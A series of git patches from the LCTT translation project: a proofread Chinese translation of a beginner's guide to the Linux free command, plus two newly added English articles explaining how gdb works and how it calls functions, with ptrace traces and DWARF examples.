Date: Sat, 13 Jan 2018 20:29:11 +0800
Subject: [PATCH 297/371] PRF:20170925 Linux Free Command Explained for
Beginners (6 Examples).md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@jessie-pang 恭喜你,完成了第一篇翻译。用心了。本次校对大多是调整了一些格式,可以参考。
---
...nd Explained for Beginners (6 Examples).md | 91 ++++++++++---------
1 file changed, 48 insertions(+), 43 deletions(-)
diff --git a/translated/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md b/translated/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
index 279bd0e75d..6e810f9f28 100644
--- a/translated/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
+++ b/translated/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
@@ -1,31 +1,33 @@
6 个例子让初学者掌握 free 命令
======
-在 Linux 系统上,有时你可能想从命令行快速地了解系统的已使用和未使用的内存空间。如果你是一个 Linux 新手,有个好消息:有一条系统内置的命令可以显示这些信息:**free**。
+在 Linux 系统上,有时你可能想从命令行快速地了解系统的已使用和未使用的内存空间。如果你是一个 Linux 新手,有个好消息:有一条系统内置的命令可以显示这些信息:`free`。
在本文中,我们会讲到 free 命令的基本用法以及它所提供的一些重要的功能。文中提到的所有命令和用法都是在 Ubuntu 16.04LTS 上测试过的。
### Linux free 命令
-让我们看一下 free 命令的语法:
-
+让我们看一下 `free` 命令的语法:
+
+```
free [options]
+```
free 命令的 man 手册如是说:
-```
-free 命令显示了系统的可用和已用的物理内存及交换内存的总量,以及内核用到的缓存空间。这些信息是从 /proc/meminfo 中得到的。
-```
+> `free` 命令显示了系统的可用和已用的物理内存及交换内存的总量,以及内核用到的缓存空间。这些信息是从 `/proc/meminfo` 中得到的。
-接下来我们用问答的方式了解一下 free 命令是怎么工作的。
+接下来我们用问答的方式了解一下 `free` 命令是怎么工作的。
### Q1. 怎么用 free 命令查看已使用和未使用的内存?
-这很容易,您只需不加任何参数地运行 free 这条命令就可以了:
-
+这很容易,您只需不加任何参数地运行 `free` 这条命令就可以了:
+
+```
free
+```
-这是 free 命令在我的系统上的输出:
+这是 `free` 命令在我的系统上的输出:
[![view used and available memory using free command][1]][2]
@@ -33,79 +35,82 @@ free
[![Free command columns][3]][4]
-total - 安装的内存的总量(等同于 /proc/meminfo 中的 MemTotal 和 SwapTotal)
-
-used - 已使用的内存(计算公式为:total - free - buffers - cache)
-
-free - 未被使用的内存(等同于 /proc/meminfo 中的 MemFree 和 SwapFree)
-
-shared - 通常是临时文件系统使用的内存(等同于 /proc/meminfo 中的 Shmem;在内核 2.6.32 版本上生效,参数无效则显示为 0)
-
-buffers - 内核缓冲区使用的内存(等同于 /proc/meminfo 中的 Buffers)
-
-cache - 页面缓存和 Slab 分配机制使用的内存(等同于 /proc/meminfo 中的 Cached 和 Slab)
-
-buff/cache - buffers 与 cache 之和
-
-available - 在不计算交换空间的情况下,预计可以被新启动的应用程序所使用的内存空间。与 cache 或者 free 部分不同,这一列把页面缓存计算在内,并且不是所有的可回收 slab 内存都可以真正被回收,因为可能有被占用的部分。(等同于 /proc/meminfo 中的 MemAvailable;在内核 3.14 版本上生效,从内核 2.6.27 版本开始仿真;在其他版本上这个值与 free 这一列相同)
+- `total` - 安装的内存的总量(等同于 `/proc/meminfo` 中的 `MemTotal` 和 `SwapTotal`)
+- `used` - 已使用的内存(计算公式为:`used` = `total` - `free` - `buffers` - `cache`)
+- `free` - 未被使用的内存(等同于 `/proc/meminfo` 中的 `MemFree` 和 `SwapFree`)
+- `shared` - 通常是临时文件系统使用的内存(等同于 `/proc/meminfo` 中的 `Shmem`;自内核 2.6.32 版本可用,不可用则显示为 `0`)
+- `buffers` - 内核缓冲区使用的内存(等同于 `/proc/meminfo` 中的 `Buffers`)
+- `cache` - 页面缓存和 Slab 分配机制使用的内存(等同于 `/proc/meminfo` 中的 `Cached` 和 `Slab`)
+- `buff/cache` - `buffers` 与 `cache` 之和
+- `available` - 在不计算交换空间的情况下,预计可以被新启动的应用程序所使用的内存空间。与 `cache` 或者 `free` 部分不同,这一列把页面缓存计算在内,并且不是所有的可回收的 slab 内存都可以真正被回收,因为可能有被占用的部分。(等同于 `/proc/meminfo` 中的 `MemAvailable`;自内核 3.14 版本可用,自内核 2.6.27 版本开始模拟;在其他版本上这个值与 `free` 这一列相同)
### Q2. 如何更改显示的单位呢?
-如果需要的话,你可以更改内存的显示单位。比如说,想要内存以兆为单位显示,你可以用 **-m** 这个参数:
-
+如果需要的话,你可以更改内存的显示单位。比如说,想要内存以兆为单位显示,你可以用 `-m` 这个参数:
+
+```
free -m
+```
[![free command display metrics change][5]][6]
-同样地,你可以用 **-b** 以字节显示、**-k** 以 KB 显示、**-m** 以 MB 显示、**-g** 以 GB 显示、**\--tera** 以 TB 显示。
+同样地,你可以用 `-b` 以字节显示、`-k` 以 KB 显示、`-m` 以 MB 显示、`-g` 以 GB 显示、`--tera` 以 TB 显示。
### Q3. 怎么显示可读的结果呢?
-free 命令提供了 **-h** 这个参数使输出转化为可读的格式。
+`free` 命令提供了 `-h` 这个参数使输出转化为可读的格式。
+```
free -h
+```
-用这个参数,free 命令会自己决定用什么单位显示内存的每个数值。例如:
+用这个参数,`free` 命令会自己决定用什么单位显示内存的每个数值。例如:
[![diplsy data fromm free command in human readable form][7]][8]
### Q4. 怎么让 free 命令以一定的时间间隔持续运行?
-您可以用 **-s** 这个参数让 free 命令以一定的时间间隔持续地执行。您需要传递给命令行一个数字参数,做为这个时间间隔的秒数。
-
-例如,使 free 命令每隔 3 秒执行一次:
+您可以用 `-s` 这个参数让 `free` 命令以一定的时间间隔持续地执行。您需要传递给命令行一个数字参数,做为这个时间间隔的秒数。
+例如,使 `free` 命令每隔 3 秒执行一次:
+
+```
free -s 3
+```
-如果您需要 free 命令只执行几次,您可以用 **-c** 这个参数指定执行的次数:
-
+如果您需要 `free` 命令只执行几次,您可以用 `-c` 这个参数指定执行的次数:
+
+```
free -s 3 -c 5
+```
-上面这条命令可以确保 free 命令每隔 3 秒执行一次,总共执行 5 次。
+上面这条命令可以确保 `free` 命令每隔 3 秒执行一次,总共执行 5 次。
-**注**:这个功能目前在Ubuntu系统上还存在 [问题][9],所以并未测试。
+注:这个功能目前在 Ubuntu 系统上还存在 [问题][9],所以并未测试。
### Q5. 怎么使 free 基于 1000 计算内存,而不是 1024?
-如果您指定 free 用 MB 来显示内存(用 -m 参数),但又想基于 1000 来计算结果,可以用 **\--sj** 这个参数来实现。下图展示了用与不用这个参数的结果:
+如果您指定 `free` 用 MB 来显示内存(用 `-m` 参数),但又想基于 1000 来计算结果,可以用 `--sj` 这个参数来实现。下图展示了用与不用这个参数的结果:
[![How to make free use power of 1000 \(not 1024\) while displaying memory figures][10]][11]
### Q6. 如何使 free 命令显示每一列的总和?
-如果您想要 free 命令显示每一列的总和,你可以用 **-t** 这个参数。
-
+如果您想要 `free` 命令显示每一列的总和,你可以用 `-t` 这个参数。
+
+```
free -t
+```
如下图所示:
[![How to make free display total of columns][12]][13]
-请注意 “Total” 这一行出现了。
+请注意 `Total` 这一行出现了。
### 总结
-free 命令对于系统管理来讲是个极其有用的工具。它有很多参数可以定制化您的输出,易懂易用。我们在本文中也提到了很多有用的参数。练习完之后,请您移步至 [man 手册][14]了解更多内容。
+`free` 命令对于系统管理来讲是个极其有用的工具。它有很多参数可以定制化您的输出,易懂易用。我们在本文中也提到了很多有用的参数。练习完之后,请您移步至 [man 手册][14]了解更多内容。
--------------------------------------------------------------------------------
@@ -114,7 +119,7 @@ via: https://www.howtoforge.com/linux-free-command/
作者:[Himanshu Arora][a]
译者:[jessie-pang](https://github.com/jessie-pang)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From c9b3dd685512e90da27b3602a795a03039d0609a Mon Sep 17 00:00:00 2001
From: wxy
Date: Sat, 13 Jan 2018 20:40:36 +0800
Subject: [PATCH 298/371] PUB:20170925 Linux Free Command Explained for
Beginners (6 Examples).md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@jessie-pang 文章首发地址: https://linux.cn/article-9232-1.html
你的 LCTT 专页地址: https://linux.cn/lctt/jessie-pang
加油!
---
...925 Linux Free Command Explained for Beginners (6 Examples).md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20170925 Linux Free Command Explained for Beginners (6 Examples).md (100%)
diff --git a/translated/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md b/published/20170925 Linux Free Command Explained for Beginners (6 Examples).md
similarity index 100%
rename from translated/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
rename to published/20170925 Linux Free Command Explained for Beginners (6 Examples).md
From 9ff33728b03b11e6a5c1af612b1bfb5532a722ea Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sat, 13 Jan 2018 20:58:07 +0800
Subject: [PATCH 299/371] Update 20180102 10 Reasons Why Linux Is Better Than
Windows.md
---
.../tech/20180102 10 Reasons Why Linux Is Better Than Windows.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20180102 10 Reasons Why Linux Is Better Than Windows.md b/sources/tech/20180102 10 Reasons Why Linux Is Better Than Windows.md
index d5bf605ddb..65dcd946f0 100644
--- a/sources/tech/20180102 10 Reasons Why Linux Is Better Than Windows.md
+++ b/sources/tech/20180102 10 Reasons Why Linux Is Better Than Windows.md
@@ -1,3 +1,4 @@
+translate by cyleft
10 Reasons Why Linux Is Better Than Windows
======
It is often seen that people get confused over choosing Windows or Linux as host operating system in both
From d10a7b9fc0dd17ffce42410abcca07d003a1981f Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sat, 13 Jan 2018 21:01:50 +0800
Subject: [PATCH 300/371] apply for translation
---
.../20171207 How To Find Files Based On their Permissions.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20171207 How To Find Files Based On their Permissions.md b/sources/tech/20171207 How To Find Files Based On their Permissions.md
index ec8f17e296..d9e6ecc95a 100644
--- a/sources/tech/20171207 How To Find Files Based On their Permissions.md
+++ b/sources/tech/20171207 How To Find Files Based On their Permissions.md
@@ -1,3 +1,4 @@
+translated by cyleft
How To Find Files Based On their Permissions
======
Finding files in Linux is not a big deal. There are plenty of free and open source graphical utilities available on the market. In my opinion, finding files from command line is much easier and faster. We already knew how to [**find and sort files based on access and modification date and time**][1]. Today, we will see how to find files based on their permissions in Unix-like operating systems.
From ef1ffa576d65c618322a2926be598901d995c2ff Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sat, 13 Jan 2018 21:33:58 +0800
Subject: [PATCH 301/371] =?UTF-8?q?20180113-1=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...20180104 \tHow does gdb call functions.md" | 252 ++++++++++++++++++
1 file changed, 252 insertions(+)
create mode 100644 "sources/tech/20180104 \tHow does gdb call functions.md"
diff --git "a/sources/tech/20180104 \tHow does gdb call functions.md" "b/sources/tech/20180104 \tHow does gdb call functions.md"
new file mode 100644
index 0000000000..a62b30ea31
--- /dev/null
+++ "b/sources/tech/20180104 \tHow does gdb call functions.md"
@@ -0,0 +1,252 @@
+How does gdb call functions?
+============================================================
+
+(previous gdb posts: [how does gdb work? (2016)][4] and [three things you can do with gdb (2014)][5])
+
+I discovered this week that you can call C functions from gdb! I thought this was cool because I’d previously thought of gdb as mostly a read-only debugging tool.
+
+I was really surprised by that (how does that WORK??). As I often do, I asked [on Twitter][6] how that even works, and I got a lot of really useful answers! My favorite answer was [Evan Klitzke’s example C code][7] showing a way to do it. Code that _works_ is very exciting!
+
+I believe (through some stracing & experiments) that that example C code is different from how gdb actually calls functions, so I’ll talk about what I’ve figured out about what gdb does in this post and how I’ve figured it out.
+
+There is a lot I still don’t know about how gdb calls functions, and very likely some things in here are wrong.
+
+### What does it mean to call a C function from gdb?
+
+Before I get into how this works, let’s talk quickly about why I found it surprising / nonobvious.
+
+So, you have a running C program (the “target program”). You want to run a function from it. To do that, you need to basically:
+
+* pause the program (because it is already running code!)
+
+* find the address of the function you want to call (using the symbol table)
+
+* convince the program (the “target program”) to jump to that address
+
+* when the function returns, restore the instruction pointer and registers to what they were before
+
+Using the symbol table to figure out the address of the function you want to call is pretty straightforward – here’s some sketchy (but working!) Rust code that I’ve been using on Linux to do that. This code uses the [elf crate][8]. If I wanted to find the address of the `foo` function in PID 2345, I’d run `elf_symbol_value("/proc/2345/exe", "foo")`.
+
+```
+fn elf_symbol_value(file_name: &str, symbol_name: &str) -> Result> {
+ // open the ELF file
+ let file = elf::File::open_path(file_name).ok().ok_or("parse error")?;
+ // loop over all the sections & symbols until you find the right one!
+ let sections = &file.sections;
+ for s in sections {
+ for sym in file.get_symbols(&s).ok().ok_or("parse error")? {
+ if sym.name == symbol_name {
+ return Ok(sym.value);
+ }
+ }
+ }
+ None.ok_or("No symbol found")?
+}
+
+```
+
+This won’t totally work on its own, you also need to look at the memory maps of the file and add the symbol offset to the start of the place that file is mapped. But finding the memory maps isn’t so hard, they’re in `/proc/PID/maps`.
+
+Anyway, this is all to say that finding the address of the function to call seemed straightforward to me but that the rest of it (change the instruction pointer? restore the registers? what else?) didn’t seem so obvious!
+
+### You can’t just jump
+
+I kind of said this already but – you can’t just find the address of the function you want to run and then jump to that address. I tried that in gdb (`jump foo`) and the program segfaulted. Makes sense!
+
+### How you can call C functions from gdb
+
+First, let’s see that this is possible. I wrote a tiny C program that sleeps for 1000 seconds and called it `test.c`:
+
+```
+#include
+
+int foo() {
+ return 3;
+}
+int main() {
+ sleep(1000);
+}
+
+```
+
+Next, compile and run it:
+
+```
+$ gcc -o test test.c
+$ ./test
+
+```
+
+Finally, let’s attach to the `test` program with gdb:
+
+```
+$ sudo gdb -p $(pgrep -f test)
+(gdb) p foo()
+$1 = 3
+(gdb) quit
+
+```
+
+So I ran `p foo()` and it ran the function! That’s fun.
+
+### Why is this useful?
+
+a few possible uses for this:
+
+* it lets you treat gdb a little bit like a C REPL, which is fun and I imagine could be useful for development
+
+* utility functions to display / navigate complex data structures quickly while debugging in gdb (thanks [@invalidop][1])
+
+* [set an arbitrary process’s namespace while it’s running][2] (featuring a not-so-surprising appearance from my colleague [nelhage][3]!)
+
+* probably more that I don’t know about
+
+### How it works
+
+I got a variety of useful answers on Twitter when I asked how calling functions from gdb works! A lot of them were like “well you get the address of the function from the symbol table” but that is not the whole story!!
+
+One person pointed me to this nice 2 part series on how gdb works that they’d written: [Debugging with the natives, part 1][9] and [Debugging with the natives, part 2][10]. Part 1 explains approximately how calling functions works (or could work – figuring out what gdb **actually** does isn’t trivial, but I’ll try my best!).
+
+The steps outlined there are:
+
+1. Stop the process
+
+2. Create a new stack frame (far away from the actual stack)
+
+3. Save all the registers
+
+4. Set the registers to the arguments you want to call your function with
+
+5. Set the stack pointer to the new stack frame
+
+6. Put a trap instruction somewhere in memory
+
+7. Set the return address to that trap instruction
+
+8. Set the instruction pointer register to the address of the function you want to call
+
+9. Start the process again!
+
+I’m not going to go through how gdb does all of these (I don’t know!) but here are a few things I’ve learned about the various pieces this evening.
+
+**Create a stack frame**
+
+If you’re going to run a C function, most likely it needs a stack to store variables on! You definitely don’t want it to clobber your current stack. Concretely – before gdb calls your function (by setting the instruction pointer to it and letting it go), it needs to set the **stack pointer** to… something.
+
+There was some speculation on Twitter about how this works:
+
+> i think it constructs a new stack frame for the call right on top of the stack where you’re sitting!
+
+and:
+
+> Are you certain it does that? It could allocate a pseudo stack, then temporarily change sp value to that location. You could try, put a breakpoint there and look at the sp register address, see if it’s contiguous to your current program register?
+
+I did an experiment where (inside gdb) I ran:`
+
+```
+(gdb) p $rsp
+$7 = (void *) 0x7ffea3d0bca8
+(gdb) break foo
+Breakpoint 1 at 0x40052a
+(gdb) p foo()
+Breakpoint 1, 0x000000000040052a in foo ()
+(gdb) p $rsp
+$8 = (void *) 0x7ffea3d0bc00
+
+```
+
+This seems in line with the “gdb constructs a new stack frame for the call right on top of the stack where you’re sitting” theory, since the stack pointer (`$rsp`) goes from being `...bca8` to `..bc00` – stack pointers grow downward, so a `bc00`stack pointer is **after** a `bca8` pointer. Interesting!
+
+So it seems like gdb just creates the new stack frames right where you are. That’s a bit surprising to me!
+
+**change the instruction pointer**
+
+Let’s see whether gdb changes the instruction pointer!
+
+```
+(gdb) p $rip
+$1 = (void (*)()) 0x7fae7d29a2f0 <__nanosleep_nocancel+7>
+(gdb) b foo
+Breakpoint 1 at 0x40052a
+(gdb) p foo()
+Breakpoint 1, 0x000000000040052a in foo ()
+(gdb) p $rip
+$3 = (void (*)()) 0x40052a
+
+```
+
+It does! The instruction pointer changes from `0x7fae7d29a2f0` to `0x40052a` (the address of the `foo` function).
+
+I stared at the strace output and I still don’t understand **how** it changes, but that’s okay.
+
+**aside: how breakpoints are set!!**
+
+Above I wrote `break foo`. I straced gdb while running all of this and understood almost nothing but I found ONE THING that makes sense to me!!
+
+Here are some of the system calls that gdb uses to set a breakpoint. It’s really simple! It replaces one instruction with `cc` (which [https://defuse.ca/online-x86-assembler.htm][11] tells me means `int3` which means `send SIGTRAP`), and then once the program is interrupted, it puts the instruction back the way it was.
+
+I was putting a breakpoint on a function `foo` with the address `0x400528`.
+
+This `PTRACE_POKEDATA` is how gdb changes the code of running programs.
+
+```
+// change the 0x400528 instructions
+25622 ptrace(PTRACE_PEEKTEXT, 25618, 0x400528, [0x5d00000003b8e589]) = 0
+25622 ptrace(PTRACE_POKEDATA, 25618, 0x400528, 0x5d00000003cce589) = 0
+// start the program running
+25622 ptrace(PTRACE_CONT, 25618, 0x1, SIG_0) = 0
+// get a signal when it hits the breakpoint
+25622 ptrace(PTRACE_GETSIGINFO, 25618, NULL, {si_signo=SIGTRAP, si_code=SI_KERNEL, si_value={int=-1447215360, ptr=0x7ffda9bd3f00}}) = 0
+// change the 0x400528 instructions back to what they were before
+25622 ptrace(PTRACE_PEEKTEXT, 25618, 0x400528, [0x5d00000003cce589]) = 0
+25622 ptrace(PTRACE_POKEDATA, 25618, 0x400528, 0x5d00000003b8e589) = 0
+
+```
+
+**put a trap instruction somewhere**
+
+When gdb runs a function, it **also** puts trap instructions in a bunch of places! Here’s one of them (per strace). It’s basically replacing one instruction with `cc` (`int3`).
+
+```
+5908 ptrace(PTRACE_PEEKTEXT, 5810, 0x7f6fa7c0b260, [0x48f389fd89485355]) = 0
+5908 ptrace(PTRACE_PEEKTEXT, 5810, 0x7f6fa7c0b260, [0x48f389fd89485355]) = 0
+5908 ptrace(PTRACE_POKEDATA, 5810, 0x7f6fa7c0b260, 0x48f389fd894853cc) = 0
+
+```
+
+What’s `0x7f6fa7c0b260`? Well, I looked in the process’s memory maps, and it turns it’s somewhere in `/lib/x86_64-linux-gnu/libc-2.23.so`. That’s weird! Why is gdb putting trap instructions in libc?
+
+Well, let’s see what function that’s in. It turns out it’s `__libc_siglongjmp`. The other functions gdb is putting traps in are `__longjmp`, `____longjmp_chk`, `dl_main`, and `_dl_close_worker`.
+
+Why? I don’t know! Maybe for some reason when our function `foo()` returns, it’s calling `longjmp`, and that is how gdb gets control back? I’m not sure.
+
+### how gdb calls functions is complicated!
+
+I’m going to stop there (it’s 1am!), but now I know a little more!
+
+It seems like the answer to “how does gdb call a function?” is definitely not that simple. I found it interesting to try to figure a little bit of it out and hopefully you have too!
+
+I still have a lot of unanswered questions about how exactly gdb does all of these things, but that’s okay. I don’t really need to know the details of how this works and I’m happy to have a slightly improved understanding.
+
+--------------------------------------------------------------------------------
+
+via: https://jvns.ca/blog/2018/01/04/how-does-gdb-call-functions/
+
+作者:[Julia Evans ][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://jvns.ca/
+[1]:https://twitter.com/invalidop/status/949161146526781440
+[2]:https://github.com/baloo/setns/blob/master/setns.c
+[3]:https://github.com/nelhage
+[4]:https://jvns.ca/blog/2016/08/10/how-does-gdb-work/
+[5]:https://jvns.ca/blog/2014/02/10/three-steps-to-learning-gdb/
+[6]:https://twitter.com/b0rk/status/948060808243765248
+[7]:https://github.com/eklitzke/ptrace-call-userspace/blob/master/call_fprintf.c
+[8]:https://cole14.github.io/rust-elf
+[9]:https://www.cl.cam.ac.uk/~srk31/blog/2016/02/25/#native-debugging-part-1
+[10]:https://www.cl.cam.ac.uk/~srk31/blog/2017/01/30/#native-debugging-part-2
+[11]:https://defuse.ca/online-x86-assembler.htm
From 9245a76c66d17853108dfa36576fd60c3dd583b1 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sat, 13 Jan 2018 21:37:12 +0800
Subject: [PATCH 302/371] =?UTF-8?q?20180113-2=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
sources/tech/20160810 How does gdb work.md | 218 +++++++++++++++++++++
1 file changed, 218 insertions(+)
create mode 100644 sources/tech/20160810 How does gdb work.md
diff --git a/sources/tech/20160810 How does gdb work.md b/sources/tech/20160810 How does gdb work.md
new file mode 100644
index 0000000000..4159f1c65a
--- /dev/null
+++ b/sources/tech/20160810 How does gdb work.md
@@ -0,0 +1,218 @@
+How does gdb work?
+============================================================
+
+Hello! Today I was working a bit on my [ruby stacktrace project][1] and I realized that now I know a couple of things about how gdb works internally.
+
+Lately I’ve been using gdb to look at Ruby programs, so we’re going to be running gdb on a Ruby program. This really means the Ruby interpreter. First, we’re going to print out the address of a global variable: `ruby_current_thread`:
+
+### getting a global variable
+
+Here’s how to get the address of the global `ruby_current_thread`:
+
+```
+$ sudo gdb -p 2983
+(gdb) p & ruby_current_thread
+$2 = (rb_thread_t **) 0x5598a9a8f7f0
+
+```
+
+There are a few places a variable can live: on the heap, the stack, or in your program’s text. Global variables are part of your program! You can think of them as being allocated at compile time, kind of. It turns out we can figure out the address of a global variable pretty easily! Let’s see how `gdb` came up with `0x5598a9a8f7f0`.
+
+We can find the approximate region this variable lives in by looking at a cool file in `/proc` called `/proc/$pid/maps`.
+
+```
+$ sudo cat /proc/2983/maps | grep bin/ruby
+5598a9605000-5598a9886000 r-xp 00000000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+5598a9a86000-5598a9a8b000 r--p 00281000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+5598a9a8b000-5598a9a8d000 rw-p 00286000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+
+```
+
+So! There’s this starting address `5598a9605000` That’s _like_ `0x5598a9a8f7f0`, but different. How different? Well, here’s what I get when I subtract them:
+
+```
+(gdb) p/x 0x5598a9a8f7f0 - 0x5598a9605000
+$4 = 0x48a7f0
+
+```
+
+“What’s that number?”, you might ask? WELL. Let’s look at the **symbol table**for our program with `nm`.
+
+```
+sudo nm /proc/2983/exe | grep ruby_current_thread
+000000000048a7f0 b ruby_current_thread
+
+```
+
+What’s that we see? Could it be `0x48a7f0`? Yes it is! So!! If we want to find the address of a global variable in our program, all we need to do is look up the name of the variable in the symbol table, and then add that to the start of the range in `/proc/whatever/maps`, and we’re done!
+
+So now we know how gdb does that. But gdb does so much more!! Let’s skip ahead to…
+
+### dereferencing pointers
+
+```
+(gdb) p ruby_current_thread
+$1 = (rb_thread_t *) 0x5598ab3235b0
+
+```
+
+The next thing we’re going to do is **dereference** that `ruby_current_thread`pointer. We want to see what’s in that address! To do that, gdb will run a bunch of system calls like this:
+
+```
+ptrace(PTRACE_PEEKTEXT, 2983, 0x5598a9a8f7f0, [0x5598ab3235b0]) = 0
+
+```
+
+You remember this address `0x5598a9a8f7f0`? gdb is asking “hey, what’s in that address exactly”? `2983` is the PID of the process we’re running gdb on. It’s using the `ptrace` system call which is how gdb does everything.
+
+Awesome! So we can dereference memory and figure out what bytes are at what memory addresses. Some useful gdb commands to know here are `x/40w variable` and `x/40b variable` which will display 40 words / bytes at a given address, respectively.
+
+### describing structs
+
+The memory at an address looks like this. A bunch of bytes!
+
+```
+(gdb) x/40b ruby_current_thread
+0x5598ab3235b0: 16 -90 55 -85 -104 85 0 0
+0x5598ab3235b8: 32 47 50 -85 -104 85 0 0
+0x5598ab3235c0: 16 -64 -55 115 -97 127 0 0
+0x5598ab3235c8: 0 0 2 0 0 0 0 0
+0x5598ab3235d0: -96 -83 -39 115 -97 127 0 0
+
+```
+
+That’s useful, but not that useful! If you are a human like me and want to know what it MEANS, you need more. Like this:
+
+```
+(gdb) p *(ruby_current_thread)
+$8 = {self = 94114195940880, vm = 0x5598ab322f20, stack = 0x7f9f73c9c010,
+ stack_size = 131072, cfp = 0x7f9f73d9ada0, safe_level = 0, raised_flag = 0,
+ last_status = 8, state = 0, waiting_fd = -1, passed_block = 0x0,
+ passed_bmethod_me = 0x0, passed_ci = 0x0, top_self = 94114195612680,
+ top_wrapper = 0, base_block = 0x0, root_lep = 0x0, root_svar = 8, thread_id =
+ 140322820187904,
+
+```
+
+GOODNESS. That is a lot more useful. How does gdb know that there are all these cool fields like `stack_size`? Enter DWARF. DWARF is a way to store extra debugging data about your program, so that debuggers like gdb can do their job better! It’s generally stored as part of a binary. If I run `dwarfdump` on my Ruby binary, I get some output like this:
+
+(I’ve redacted it heavily to make it easier to understand)
+
+```
+DW_AT_name "rb_thread_struct"
+DW_AT_byte_size 0x000003e8
+DW_TAG_member
+ DW_AT_name "self"
+ DW_AT_type <0x00000579>
+ DW_AT_data_member_location DW_OP_plus_uconst 0
+DW_TAG_member
+ DW_AT_name "vm"
+ DW_AT_type <0x0000270c>
+ DW_AT_data_member_location DW_OP_plus_uconst 8
+DW_TAG_member
+ DW_AT_name "stack"
+ DW_AT_type <0x000006b3>
+ DW_AT_data_member_location DW_OP_plus_uconst 16
+DW_TAG_member
+ DW_AT_name "stack_size"
+ DW_AT_type <0x00000031>
+ DW_AT_data_member_location DW_OP_plus_uconst 24
+DW_TAG_member
+ DW_AT_name "cfp"
+ DW_AT_type <0x00002712>
+ DW_AT_data_member_location DW_OP_plus_uconst 32
+DW_TAG_member
+ DW_AT_name "safe_level"
+ DW_AT_type <0x00000066>
+
+```
+
+So. The name of the type of `ruby_current_thread` is `rb_thread_struct`. It has size `0x3e8` (or 1000 bytes), and it has a bunch of member items. `stack_size` is one of them, at an offset of 24, and it has type 31\. What’s 31? No worries! We can look that up in the DWARF info too!
+
+```
+< 1><0x00000031> DW_TAG_typedef
+ DW_AT_name "size_t"
+ DW_AT_type <0x0000003c>
+< 1><0x0000003c> DW_TAG_base_type
+ DW_AT_byte_size 0x00000008
+ DW_AT_encoding DW_ATE_unsigned
+ DW_AT_name "long unsigned int"
+
+```
+
+So! `stack_size` has type `size_t`, which means `long unsigned int`, and is 8 bytes. That means that we can read the stack size!
+
+How that would break down, once we have the DWARF debugging data, is:
+
+1. Read the region of memory that `ruby_current_thread` is pointing to
+
+2. Add 24 bytes to get to `stack_size`
+
+3. Read 8 bytes (in little-endian format, since we’re on x86)
+
+4. Get the answer!
+
+Which in this case is 131072 or 128 kb.
+
+To me, this makes it a lot more obvious what debugging info is **for** – if we didn’t have all this extra metadata about what all these variables meant, we would have no idea what the bytes at address `0x5598ab3235b0` meant.
+
+This is also why you can install debug info for a program separately from your program – gdb doesn’t care where it gets the extra debug info from.
+
+### DWARF is confusing
+
+I’ve been reading a bunch of DWARF info recently. Right now I’m using libdwarf which hasn’t been the best experience – the API is confusing, you initialize everything in a weird way, and it’s really slow (it takes 0.3 seconds to read all the debugging data out of my Ruby program which seems ridiculous). I’ve been told that libdw from elfutils is better.
+
+Also, I casually remarked that you can look at `DW_AT_data_member_location` to get the offset of a struct member! But I looked up on Stack Overflow how to actually do that and I got [this answer][2]. Basically you start with a check like:
+
+```
+dwarf_whatform(attrs[i], &form, &error);
+ if (form == DW_FORM_data1 || form == DW_FORM_data2
+ form == DW_FORM_data2 || form == DW_FORM_data4
+ form == DW_FORM_data8 || form == DW_FORM_udata) {
+
+```
+
+and then it keeps GOING. Why are there 8 million different `DW_FORM_data` things I need to check for? What is happening? I have no idea.
+
+Anyway my impression is that DWARF is a large and complicated standard (and possibly the libraries people use to generate DWARF are subtly incompatible?), but it’s what we have, so that’s what we work with!
+
+I think it’s really cool that I can write code that reads DWARF and my code actually mostly works. Except when it crashes. I’m working on that.
+
+### unwinding stacktraces
+
+In an earlier version of this post, I said that gdb unwinds stacktraces using libunwind. It turns out that this isn’t true at all!
+
+Someone who’s worked on gdb a lot emailed me to say that they actually spent a ton of time figuring out how to unwind stacktraces so that they can do a better job than libunwind does. This means that if you get stopped in the middle of a weird program with less debug info than you might hope for that’s done something strange with its stack, gdb will try to figure out where you are anyway. Thanks <3
+
+### other things gdb does
+
+The few things I’ve described here (reading memory, understanding DWARF to show you structs) aren’t everything gdb does – just looking through Brendan Gregg’s [gdb example from yesterday][3], we see that gdb also knows how to
+
+* disassemble assembly
+
+* show you the contents of your registers
+
+and in terms of manipulating your program, it can
+
+* set breakpoints and step through a program
+
+* modify memory (!! danger !!)
+
+Knowing more about how gdb works makes me feel a lot more confident when using it! I used to get really confused because gdb kind of acts like a C REPL sometimes – you type `ruby_current_thread->cfp->iseq`, and it feels like writing C code! But you’re not really writing C at all, and it was easy for me to run into limitations in gdb and not understand why.
+
+Knowing that it’s using DWARF to figure out the contents of the structs gives me a better mental model and have more correct expectations! Awesome.
